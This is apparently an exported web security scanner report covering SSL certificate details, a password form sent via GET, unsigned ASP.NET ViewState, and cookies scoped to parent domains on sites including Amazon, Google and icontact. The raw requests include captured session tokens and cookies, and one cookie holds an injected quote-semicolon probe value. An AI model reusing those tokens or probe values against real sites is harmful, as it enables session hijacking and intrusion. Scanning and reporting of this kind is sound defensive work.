The server presented a valid, trusted SSL certificate. This issue is purely informational.Server certificate Issued to: idp.godaddy.com Issued by: Go Daddy Secure Certification Authority Valid from: Tue Nov 30 20:24:00 CST 2010 Valid to: Mon Dec 31 14:37:10 CST 2012
Certificate chain #1 Issued to: Go Daddy Secure Certification Authority Issued by: Go Daddy Class 2 Certification Authority Valid from: Wed Nov 15 19:54:37 CST 2006 Valid to: Sun Nov 15 19:54:37 CST 2026
Certificate chain #2 Issued to: Go Daddy Class 2 Certification Authority Issued by: http://www.valicert.com/ Valid from: Tue Jun 29 12:06:20 CDT 2004 Valid to: Sat Jun 29 12:06:20 CDT 2024
Certificate chain #3 Issued to: http://www.valicert.com/ Issued by: http://www.valicert.com/ Valid from: Fri Jun 25 19:19:54 CDT 1999 Valid to: Tue Jun 25 19:19:54 CDT 2019
7.5. https://livechat.iadvize.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://livechat.iadvize.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational.Server certificate Issued to: *.iadvize.com Issued by: RapidSSL CA Valid from: Sun Jul 10 09:23:46 CDT 2011 Valid to: Thu Jul 11 21:55:51 CDT 2013
Certificate chain #1 Issued to: RapidSSL CA Issued by: GeoTrust Global CA Valid from: Fri Feb 19 16:45:05 CST 2010 Valid to: Tue Feb 18 16:45:05 CST 2020
Certificate chain #2 Issued to: GeoTrust Global CA Issued by: GeoTrust Global CA Valid from: Mon May 20 23:00:00 CDT 2002 Valid to: Fri May 20 23:00:00 CDT 2022
7.6. https://mya.godaddy.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational.Server certificate Issued to: mya.godaddy.com Issued by: Go Daddy Secure Certification Authority Valid from: Fri Sep 09 17:47:26 CDT 2011 Valid to: Mon Dec 31 14:35:30 CST 2012
Certificate chain #1 Issued to: Go Daddy Secure Certification Authority Issued by: Go Daddy Class 2 Certification Authority Valid from: Wed Nov 15 19:54:37 CST 2006 Valid to: Sun Nov 15 19:54:37 CST 2026
Certificate chain #2 Issued to: Go Daddy Class 2 Certification Authority Issued by: http://www.valicert.com/ Valid from: Tue Jun 29 12:06:20 CDT 2004 Valid to: Sat Jun 29 12:06:20 CDT 2024
Certificate chain #3 Issued to: http://www.valicert.com/ Issued by: http://www.valicert.com/ Valid from: Fri Jun 25 19:19:54 CDT 1999 Valid to: Tue Jun 25 19:19:54 CDT 2019
7.7. https://www.google.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.google.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational.Server certificate Issued to: www.google.com Issued by: Thawte SGC CA Valid from: Thu Dec 17 18:00:00 CST 2009 Valid to: Sun Dec 18 17:59:59 CST 2011
Certificate chain #1 Issued to: Thawte SGC CA Issued by: Class 3 Public Primary Certification Authority Valid from: Wed May 12 19:00:00 CDT 2004 Valid to: Mon May 12 18:59:59 CDT 2014
Certificate chain #2 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 CST 1996 Valid to: Wed Aug 02 18:59:59 CDT 2028
8. Password field submitted using GET method
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://shoprunner.force.com
Path:
/content/JsContentElementsDRGS
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:http://shoprunner.force.com/content/step1
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST" . It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET /content/JsContentElementsDRGS HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK-------------------------------- */...[SNIP]... <form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"> <h4 class="sr_htag">...[SNIP]... <input class="sr_vpassword" name="password2" tabindex="1" type="password"> </li>...[SNIP]...
9. ASP.NET ViewState without MAC enabled
previous
next
There are 3 instances of this issue:
Issue description
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
9.1. http://go.icontact.com/SEM/AP
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://go.icontact.com
Path:
/SEM/AP
Request
GET /SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" lang="en">...[SNIP]... /wEPDwUKMTIzNjIzMDUzNmRk " />...[SNIP]...
9.2. http://go.icontact.com/SEM/AP/free-30-day-trial-20J6-1725H4.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://go.icontact.com
Path:
/SEM/AP/free-30-day-trial-20J6-1725H4.html
Request
GET /SEM/AP/free-30-day-trial-20J6-1725H4.html HTTP/1.1/SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=1ehsmpmkcgj5x3opjna0dmeh; _mkto_trk=id:720-FDE-591&token:_mch-icontact.com-1316204855532-39757; LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578
Response
HTTP/1.1 200 OK=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" lang="en">...[SNIP]... /wEPDwUKMTIzNjIzMDUzNmRk " />...[SNIP]...
9.3. http://go.icontact.com/SEM/AP/home-20J6-17231V.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://go.icontact.com
Path:
/SEM/AP/home-20J6-17231V.html
Request
POST /SEM/AP/home-20J6-17231V.html?rid=1286578&rky=LBG7YTE7&tky=129606603206814841 HTTP/1.1/SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=1ehsmpmkcgj5x3opjna0dmeh; LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; _mkto_trk=id:720-FDE-591&token:_mch-icontact.com-1316204855532-39757%2FwEPDwUKMTIzNjIzMDUzNmRk &experience_level=New&ctl26=+++Next+Step++
Response
HTTP/1.1 302 Found=J6&pgi=1723&pgk=1V1547WG&eli=WtfDblh%2fxXwZ3ln0M1g%2fUQ%3d%3d&rid=1286578&rky=LBG7YTE7&tky=129606603518212652=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/>=20&sky=J6&pgi=1723&pgk=1V1547WG&eli=WtfDblh%2fxXwZ3ln0M1g%2fUQ%3d%3d&rid=12865...[SNIP]...
10. Cookie scoped to parent domain
previous
next
There are 46 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
10.1. http://mct.rkdms.com/sid.gif
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://mct.rkdms.com
Path:
/sid.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:sessionid=h-1fe0eb546ed368ebf937b670b69487dc_t-1316190637; domain=.rkdms.com; path=/; expires=Sat, 15-Sep-2012 16:30:37 GMT
Request
GET /sid.gif?mid=drugstore&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1/*;q=0.5;q=0.7
Response
HTTP/1.1 200 OK-revalidateSet-Cookie: sessionid=h-1fe0eb546ed368ebf937b670b69487dc_t-1316190637; domain=.rkdms.com; path=/; expires=Sat, 15-Sep-2012 16:30:37 GMT .rkdms.com/w3c/p3p.xml", CP="CURa ADMa DEVa OUR COM NAV INT CNT STA NID DSP NOI COR", policyref="http://www.rkdms.com/w3c/p3p.xml", CP="CURa ADMa DEVa OUR COM NAV INT CNT STA NID DSP NOI COR", policyref="http://www.rkdms.com/w3c/p3p.xml", CP="CURa ADMa DEVa OUR COM NAV INT CNT STA NID DSP NOI COR"..,...........D..;
10.2. http://www.amazon.com/gp/loader/jsonp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.amazon.com
Path:
/gp/loader/jsonp
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT session-id=188-7348060-9795407; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT ubid-main=189-8322294-4852542; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT
Request
GET /gp/loader/jsonp?c=assoc_retail_asset_preload HTTP/1.1-amazon.com/images/G/01/associates/widgets/20070822/US/html/preload_retail_asset._V152385065_.html;q=0.3.337409241.1315233673.1315233673.1315236916.2; __utmz=194891197.1315236916.2.2.utmccn=(referral)|utmcsr=aws-portal.amazon.com|utmcct=/gp/aws/html-forms-controller/contactus98dd2'%3bac3249871a9/aws-account-and-billing|utmcmd=referral; ct-main="?yScNOlWT31nv@QGPOP6MZlUTgEuPV67"; 5SnMamzvowels-14730.pos=1; 5SnMamzvowels-14730.time.0=1315237100818; apn-user-id=ad436c0d-3f66-48df-8380-85023e358301; x-main="kYmMgX@s6zRSHrgXsrT2Jct5JsIxFj@7"; aws-ubid-main=189-0212498-8250436; aws-x-main=UsPqM6hqJEtppz2vUlxJzQS7UOORf9DA; session-token=SQF/NkehkGMk+jdlo6/NLXrRBtfG2aeSiUcxmLBxdBQ8cmJRMfNGlYkOX0a/N00l4OzAutqHvfb9FBh+fr8MF6/DdmBOr5uYhE9XOogb0pkADN6BRGFMatq2bldyvYdHA3jnepv+7Arl9xnJWdTft1/gFN5GixtGQVw8ONCdfFj7229gWrFCR/ylhyeHArd92XSZrR8ObUdlW6zcVvlI08NLUSNtliR/aHfv+MkySJE2G/JWqf7h9pFBH71guzzVfsd8zXeStVUwsLfl2A70Cg==; ubid-main=189-8322294-4852542; session-id-time=2082787201l; session-id=188-7348060-9795407
Response
HTTP/1.1 200 OK.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "hE0VX4iDZHL0ioPBD7LjGkhf7vqRU0ghhAp4FK1O9i7Z-Agent-4852542; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMTSet-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT Set-cookie: session-id=188-7348060-9795407; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT _preload([
10.3. http://amch.questionmarket.com/adsc/d887846/17/909940/adscout.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://amch.questionmarket.com
Path:
/adsc/d887846/17/909940/adscout.php
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:CS1=deleted; expires=Thu, 16 Sep 2010 16:24:53 GMT; path=/; domain=.questionmarket.com CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; expires=Tue, 06 Nov 2012 08:24:54 GMT; path=/; domain=.questionmarket.com ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0; expires=Tue, 06-Nov-2012 08:24:54 GMT; path=/; domain=.questionmarket.com;
Request
GET /adsc/d887846/17/909940/adscout.php HTTP/1.1/portal/tabs/?tab_name=News;q=0.35152932-9-1_600001512117-15-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0
Response
HTTP/1.1 200 OK.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"Set-Cookie: CS1=deleted; expires=Thu, 16 Sep 2010 16:24:53 GMT; path=/; domain=.questionmarket.com Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; expires=Tue, 06 Nov 2012 08:24:54 GMT; path=/; domain=.questionmarket.com Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0; expires=Tue, 06-Nov-2012 08:24:54 GMT; path=/; domain=.questionmarket.com; ..,...........D..;
10.4. http://amch.questionmarket.com/adsc/d922317/2/43977402/decide.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://amch.questionmarket.com
Path:
/adsc/d922317/2/43977402/decide.php
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:CS1=deleted; expires=Thu, 16-Sep-2010 16:30:33 GMT; path=/; domain=.questionmarket.com CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2; expires=Tue, 06-Nov-2012 08:30:34 GMT; path=/; domain=.questionmarket.com ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-1; expires=Tue, 06-Nov-2012 08:30:34 GMT; path=/; domain=.questionmarket.com;
Request
GET /adsc/d922317/2/43977402/decide.php?ord=1316208680 HTTP/1.1/*;q=0.5;q=0.7-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1
Response
HTTP/1.1 200 OKnetServer/2.0.50.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"Set-Cookie: CS1=deleted; expires=Thu, 16-Sep-2010 16:30:33 GMT; path=/; domain=.questionmarket.com Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2; expires=Tue, 06-Nov-2012 08:30:34 GMT; path=/; domain=.questionmarket.com Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-1; expires=Tue, 06-Nov-2012 08:30:34 GMT; path=/; domain=.questionmarket.com; ..,...........D..;
10.5. http://apis.google.com/js/plusone.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://apis.google.com
Path:
/js/plusone.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4;Domain=.google.com;Path=/;Expires=Mon, 13-Sep-2021 17:54:35 GMT
Request
GET /js/plusone.js HTTP/1.1;q=0.3:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO4AAAD7Xl0oDS_3Xy0JKwYeKgRjMbxp0c2W5DSFLy2Y9JkSJYmKvv1nBof0akZrOA6irTQl8KxP9Eoae06RbjzCClA25MRuVFdF6rXzUkh8SKGCxg1rw75hUuF-Q6Hfpq5C54hAzhRx-AmmtuoAFnzNK8zWfOVJpa_QelYHWpLFQHbnPZSoTt-oYFQ8FvrjsTQtOrrTGqDw6xFuT1mXvxsUuamUyR2icH4Fzc2kSrnlcFORO_n1bWSW0aN0HPNXtAVlbrIKfpZOlzJv9hO2NdES_xUtKqOl4j7gqJr7lekB4ZGb18ynomXsS5lHVunDhfYOlCo; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df
Response
HTTP/1.1 200 OKSet-Cookie: SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4;Domain=.google.com;Path=/;Expires=Mon, 13-Sep-2021 17:54:35 GMT /support/accounts/bin/answer.py?hl=en&answer=151657 for more info."_jsl||{};_jsl.h||'r;gc\/23803279-4555db52';=window.__GOOGLEAPIS||{};.gwidget=window.__GOOGL...[SNIP]...
10.6. http://b.scorecardresearch.com/b
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/b
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:UID=9951d9b8-80.67.74.150-1314793633; expires=Sun, 15-Sep-2013 15:29:21 GMT; path=/; domain=.scorecardresearch.com
Request
GET /b?c1=7&c2=8097938&rn=1687656345&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.blackbaud.com%252F%26jsref%3D%26rnd%3D1316204996203&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.blackbaud.com%2F&cv=2.2&cs=js HTTP/1.1/getSegment.php?purl=http%3A%2F%2Fwww.blackbaud.com%2F&jsref=&rnd=1316204996203;q=0.3-1314793633
Response
HTTP/1.1 204 No ContentSet-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Sun, 15-Sep-2013 15:29:21 GMT; path=/; domain=.scorecardresearch.com
10.7. http://bstats.adbrite.com/click/bstats.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://bstats.adbrite.com
Path:
/click/bstats.gif
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ut="1%3AHcxBCoAgEEDRu8y6RQZJeBsrjTQdtbDC6e6V28%2FjF8gdiAJW3SemeQcBCXmbiZ3DoA0xapsQjgOJZc3DUkNSceuJXShdpO4X3tz6E1Ow7hfQwCi9V2mtR3ieFw%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 13-Sep-2021 16:30:26 GMT vsd=0@2@4e7379a2@www.drugstore.com; path=/; domain=.adbrite.com; expires=Sun, 18-Sep-2011 16:30:26 GMT
Request
GET /click/bstats.gif?kid=46037273&bapid=7622&uid=740987 HTTP/1.1/*;q=0.5;q=0.7+1312290886x-1235322650"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirKNzMoqzEst7BIy6oxrDHQKSgoKcmvMSxLMytIhwjkZVWmAQWSC7JzQQJKOkpJiXl5qUWZYAOUamsB"; rb2=ChwKBjcxMjE1NhiVssXtMSIMZ2w5OWloMGoweHFuCjwKBjcxMjE4MRip_KKIMiIsV1g5cVpWZDJUWFZFQm1OZUFRWnlYQUpRYVhzUWRBRkJERmxwVlZGT1lBPT0KIwoGNzQyNjk3GPfN-pYuIhM5MDMzNDQyMzIwOTE2MDg3NjM0EAE; rb="0:712156:20838240:gl99ih0j0xqn:0:712181:20838240:WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==:0:742697:20828160:9033442320916087634:0"
Response
HTTP/1.1 200 OKSet-Cookie: ut="1%3AHcxBCoAgEEDRu8y6RQZJeBsrjTQdtbDC6e6V28%2FjF8gdiAJW3SemeQcBCXmbiZ3DoA0xapsQjgOJZc3DUkNSceuJXShdpO4X3tz6E1Ow7hfQwCi9V2mtR3ieFw%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 13-Sep-2021 16:30:26 GMT Set-Cookie: vsd=0@2@4e7379a2@www.drugstore.com; path=/; domain=.adbrite.com; expires=Sun, 18-Sep-2011 16:30:26 GMT .adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"..,........@..D.;
10.8. http://go.icontact.com/SEM/AP
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://go.icontact.com
Path:
/SEM/AP
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/
Request
GET /SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKSet-Cookie: LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" lang="en">...[SNIP]...
10.9. http://go.icontact.com/SEM/AP/free-30-day-trial-20J6-1725H4.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://go.icontact.com
Path:
/SEM/AP/free-30-day-trial-20J6-1725H4.html
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/
Request
GET /SEM/AP/free-30-day-trial-20J6-1725H4.html HTTP/1.1/SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=1ehsmpmkcgj5x3opjna0dmeh; _mkto_trk=id:720-FDE-591&token:_mch-icontact.com-1316204855532-39757; LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578
Response
HTTP/1.1 200 OKSet-Cookie: LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" lang="en">...[SNIP]...
10.10. http://go.icontact.com/SEM/AP/home-20J6-17231V.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://go.icontact.com
Path:
/SEM/AP/home-20J6-17231V.html
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/
Request
POST /SEM/AP/home-20J6-17231V.html?rid=1286578&rky=LBG7YTE7&tky=129606603206814841 HTTP/1.1/SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=1ehsmpmkcgj5x3opjna0dmeh; LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; _mkto_trk=id:720-FDE-591&token:_mch-icontact.com-1316204855532-39757UKMTIzNjIzMDUzNmRk&experience_level=New&ctl26=+++Next+Step++
Response
HTTP/1.1 302 Found=J6&pgi=1723&pgk=1V1547WG&eli=WtfDblh%2fxXwZ3ln0M1g%2fUQ%3d%3d&rid=1286578&rky=LBG7YTE7&tky=129606603518212652Set-Cookie: LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=/ >=20&sky=J6&pgi=1723&pgk=1V1547WG&eli=WtfDblh%2fxXwZ3ln0M1g%2fUQ%3d%3d&rid=12865...[SNIP]...
10.11. http://ib.adnxs.com/mapuid
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ib.adnxs.com
Path:
/mapuid
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:uuid2=2230616255569715877; path=/; expires=Thu, 15-Dec-2011 16:30:31 GMT; domain=.adnxs.com; HttpOnly uuid2=2230616255569715877; path=/; expires=Thu, 15-Dec-2011 16:30:31 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG68%DYS3+0s]#%2L_'x%SEV/i#+R<4FSn39!r-OkI+zwP7ooYCfd'MJW`c83dBY1)n(>M[<%V[aJ87vV/B@4NYs.YMlDRVIc)_H8y.$NwqVq!7%!wRG/GEp+_VEw/H0cbO+^m4wywmqvD5HylZt-`lsg>'U7h_pKrAi%rT.y?o9'UK6C(jUw_Z.6IFBGy$PK`lu0M6]2s<KIl%_rd%1[EkoV60CGW9)8=tOO<*)xPd`pOWAH^1JiBtesaB:bjz!Z4@A.V9>Z4/>Rhdwnc4Lu9v4EGutB^9(LJwLYo>*<4V?[?QarR!yd6x$3p6s4y9=*jX/T*jr`Mw6TFZ%zE6'f1ZdRRP4T1G*Xlas6zLgu4JM*^DFF/MBCoQ+#s!y^GpU7Wbjxj$[4zrjDdg%=b8H(2MYRYrYXj_?mUnGjoPmm><'LM?#]ki5O*BR; path=/; expires=Thu, 15-Dec-2011 16:30:31 GMT; domain=.adnxs.com; HttpOnly
Request
GET /mapuid?member=311&user=121773f9380f32f&seg_code=noseg&ord=1316190630 HTTP/1.1/*;q=0.5;q=0.7; anj=Kfu=8fG3x=DYS3+0s]#%2L_'x%SEV/i#-ve4FSn39!r-OkI+zwP7ooYCfd'MJW`c83dBY1J^1-5Cntr395?t(4KFjNtVo6NbIG)y#5Z34o7G%v^Fw$`AOx*J(**-7Nh+W.(JV+:gkMW-QRHM#D3I)HhnI(LJ!-aw'VUgsN[as8T8hX74K]7EtSI=V($/vI+)i(IK!IzA[?am$Mm1[N#9If)DYy?#8f_5uOttjiYIEScq5a)DL9DaLSMw=S?7p:`Sg#Ej8+8not7cI9d`eBg)nAQjhWMBa!=O</of]uRE<maNa.+a=X11p#>y#GIFSZB0X.z!NCo!Hs$%(zje8IhvO8hr.31QM`8<5a!-Pj8C6y.invljGq94->PEVb%QV[k@]mYI$cI0VyCP''%J4/</I9G=bM.vp(.?$RyfL5v]FG@0EX; icu=ChII9K4DEAoYASABKAEwzZ_u8gQQzZ_u8gQYAA..; sess=1
Response
